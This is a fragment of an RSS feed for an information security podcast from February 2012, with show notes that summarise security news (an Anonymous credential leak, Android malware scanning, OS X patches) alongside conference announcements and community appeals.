<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://news.softpedia.com/news/Anonymous-Leaks-Passwords-from-Ireland-s-Foreign-Affairs-Site-250514.shtml"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Anonymous-Leaks-Passwords-from-Ireland-s-Foreign-Affairs-Site-250514.shtml</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous hackers managed to gain access to the official website of the Irish government&rsquo;s Department of Foreign Affairs, obtaining passwords used by employees and officials. Some of the passwords were used to administrate the website Irish Aid, an overseas development program.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to The Journal, members of Anonymous Sweden led to believe that these attacks, part of OpIreland, were launched as a protest against the plans to introduce a new SOPA-like legislation.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Of the 19 credential sets leaked, 17 were used by the Department of Foreign Affairs to edit the Irish Aid website, while the other 2 were utilized by the staffers of the company that developed the site.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We are aware of website user login information being posted online. The website server has been taken offline as a precautionary measure and the matter is being investigated by our IT specialists,&rdquo; said a Department of Foreign Affairs spokeswoman.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;This is an external service and is separate to the internal Department servers; these have not been affected.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It seems that Se&aacute;n Sherlock, the junior minister behind the new law, is one of the main targets, Anonymous revealing that it plans on targeting the Labour Party&rsquo;s website next, part of which Sherlock is a member.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At press time, the website of the Department of Foreign Affairs in back online, but Irish Aid displays a message that reveals they&rsquo;re currently &ldquo;undergoing essential maintenance.&rdquo;</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="https://www.eff.org/deeplinks/2012/02/what-actually-changed-google%27s-privacy-policy"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.eff.org/deephttps://www.eff.org/deeplinks/2012/02/what-actually-changed-google%27s-privacy-policylinks/2012/02/what-actually-changed-google%27s-privacy-policy</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last week, Google announced a new, simplified privacy policy. They did a great job of informing users that the privacy policy had been changed through emails and notifications, and several experts (including Ontario&rsquo;s Privacy Commissioner Dr. Ann Cavoukian) have praised the shift toward a simpler, more unified policy. Unfortunately, while the policy might be easier to understand, Google did a less impressive job of publicly explaining what in the policy had actually been changed. &nbsp;In fact, it took a letter from eight Representatives to persuade them to provide straightforward answers to the public about their new policy.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://news.cnet.com/8301-13506_3-57370274-17/google-must-pay-$660000-for-offering-google-maps-for-free/?tag=rtcol;dis"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-13506_3-57370274-17/google-must-pay-$660000-for-offering-google-maps-for-free/?tag=rtcol;dis</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Paris court earlier this week ordered Google France and its parent company Google to pay plaintiff Bottin Cartographes 500,000 euros (about $660,000) for providing its free mapping services to businesses across the country. The court also required Google to pay a 15,000 euro fine for its practice.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We proved the illegality of (Google&#39;s) strategy to remove its competitors,&quot; Jean-David Scemmama, attorney for Bottin Cartographes, a company that provides mapping services to businesses,</span><a href="http://www.google.com/hostednews/afp/article/ALeqM5hpu8TuRZEBjM30sFn8c7QvMWNjXA?docId=CNG.108b2dd2393721c4759b1eec0730b297.171"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">told the AFP in an interview earlier this week</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. &quot;The court recognized the unfair and abusive character of the methods used, and allocated Bottin Cartographes all it claimed. This is the first time Google has been convicted for its Google Maps application.&quot;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Scemmama, Bottin has been arguing its case against Google for two years, claiming the search giant was engaging in anticompetitive practices by using its free service to take control over the online-mapping industry.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a statement to the AFP, Google said that it will appeal the court&#39;s decision, adding that Google Maps is still facing competition in that market.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-585-eyes-open-bouncer-php-nato-deficiencies-fakebook-accounts-whats-new/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3457/0/infosec-daily-podcast-episode-585.mp3" length="20614669" type="audio/mpeg" />
		<itunes:duration>0:42:54</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 585 for February 3, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez,
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and w[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 585 for February 3, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez,
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
	Source: 
http://www.forbes.com/sites/andygreenberg/2012/02/02/google-gets-serious-about-android-security-now-auto-scans-app-market-for-malware/ 
&#160;
Source: http://googlemobile.blogspot.com/2012/02/android-and-security.html 

	The last year has been a phenomenal one for the Android ecosystem. Device activations grew 250% year-on-year, and the total number of app downloads from Android Market topped 11 billion. As the platform continues to grow, we&#8217;re focused on bringing you the best new features and innovations &#8211; including in security.
	Today we&#8217;re revealing a service we&#8217;ve developed, codenamed Bouncer, which provides automated scanning of Android Market for potentially malicious software without disrupting the user experience of Android Market or requiring develo[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 584 &#8211; OS X 10.7.3, HTC WiFi Oops!, Leading Hackers, Passware &amp; VeriSign</title>
		<link>http://www.isdpodcast.com/episode-584-episode-584-os-x-10-7-3-htc-wifi-oops-leading-hackers-passware-verisign</link>
		<comments>http://www.isdpodcast.com/episode-584-episode-584-os-x-10-7-3-htc-wifi-oops-leading-hackers-passware-verisign#comments</comments>
		<pubDate>Fri, 03 Feb 2012 01:47:24 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3452</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 584 for February 2, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 584 for February 2, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a><a href="http://threatpost.com/en_us/blogs/apple-ships-huge-set-patches-os-x-020212"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/apple-ships-huge-set-patches-os-x-020212</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://threatpost.com/en_us/blogs/apple-ships-huge-set-patches-os-x-020212"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple has released a massive set of patches for a wide range of security vulnerabilities in a number of its products and components, including OSX Lion and QuickTime. The patches, which are rolled up in OS X 10.7.3, fix a slew of serious bugs, many of which can be used to execute remote code on vulnerable machines.</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://threatpost.com/en_us/blogs/apple-ships-huge-set-patches-os-x-020212"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One of the more serious vulnerabilities Apple fixed is the flaw that researchers</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Juliano Rizzo and Thai Duong discovered in the TLS 1.0 and SSL 3.0 protocols last year. The vulnerability, for which they wrote a proof-of-concept exploit tool called BEAST, is fixed in the new version of Apache that</span><a href="https://support.apple.com/kb/HT5130"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Apple included in yesterday&#39;s patches</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. Exploiting the flaw enables an attacker to decrypt some SSL sessions.</span></p>
